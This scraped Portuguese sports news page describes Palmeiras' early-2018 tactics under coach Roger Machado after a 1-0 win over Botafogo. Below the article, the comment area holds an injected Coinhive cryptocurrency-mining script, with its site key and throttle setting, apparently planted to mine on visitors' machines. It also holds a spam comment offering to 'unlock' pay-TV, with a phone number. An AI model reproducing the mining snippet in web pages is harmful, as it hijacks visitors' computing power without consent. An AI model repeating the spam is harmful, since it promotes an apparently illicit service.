Palmeiras dosa parte física e começa a mostrar padrão de jogo

22/1/2018 08:04

Palmeiras dosa parte física e começa a mostrar padrão de jogo

Primeiros dois jogos do ano, ambos com vitória, mostram pontos em comum

Palmeiras dosa parte física e começa a mostrar padrão de jogo

O planejamento do Palmeiras neste início de ano tem funcionado. São duas vitórias em duas partidas, a mais recente no último domingo (1 a 0 sobre o Botafogo), com repetição de escalação e primeiras mostras de padrão de jogo, mas também preocupação com a condição física do elenco.







Para levar a campo em Ribeirão Preto os mesmos titulares do 4-1-4-1 de quinta-feira passada contra o Santo André, o técnico Roger Machado e sua comissão decidiram usar os dois dias de intervalo exclusivamente para recuperar os atletas. Na sexta-feira e no sábado, apenas os reservas trabalharam com bola.





Como na estreia, Roger armou o Palmeiras com Felipe Melo entre duas linhas (Foto: GloboEsporte.com)



Deu certo. Apesar de um início de quase nenhuma chance de gol, influenciado em certa medida pelo calor intenso do interior paulista, a equipe corrigiu os problemas no intervalo - já com sombra no estádio Santa Cruz - e fez um segundo tempo completamente diferente, de menos espaços e mais aproximação nos passes.



O padrão treinado por Roger Machado é esse, do "jogo apoiado", com triangulações para envolver e furar a marcação. A ideia é que sempre alguém se apresente no espaço vazio para receber a bola.



Veja no vídeo abaixo o exemplo de paciência da equipe no primeiro minuto da segunda etapa para encontrar espaço na retranca botafoguense: são 24 passes até Dudu partir em direção à área e ser derrubado com falta.



Outra tática ensaiada no dia a dia e que vem sendo colocada em prática é a "saída de três": um volante afunda entre os dois zagueiros abertos para receber a bola, enquanto os dois laterais puxam a marcação no ataque. Assim, o Palmeiras ganha terreno ao empurrar o Botafogo para trás, facilitando a transição ofensiva.





Zagueiros abrem, e Felipe Melo busca a bola. Note: laterais não aparecem no quadro (Foto: Reprodução)



É muito cedo, começo de temporada, mas a opção de Roger tem sido mais eficiente, por exemplo, do que a estratégia do são-paulino Dorival Júnior, que escalou dois times diferentes nas duas primeiras rodadas e ainda não venceu. O palmeirense também se mostra preocupado com a questão física, mas vem apostando nos jogos como forma de entrosamento.



Para o próximo compromisso, diante do RB Brasil, na arena há um tempo maior de preparação. Tempo que deve ser utilizado para reforçar o que funcionou no segundo tempo de domingo e na primeira etapa de quinta-feira passada. O jogo é apenas na quinta-feira.



VEJA TAMBÉM
- VAI QUEBRAR O TABU? Palmeiras busca vitória importante em confronto com Flamengo
- Palmeiras se prepara para enfrentar Flamengo sem Zé Rafael no elenco.
- Bastidores de Felipe Anderson no Palmeiras: Revelações de Leila Pereira.





5232 visitas - Fonte: Globo Esporte

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

abre o olho Dudu se não começar a jogar bem sua batata vai assar

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras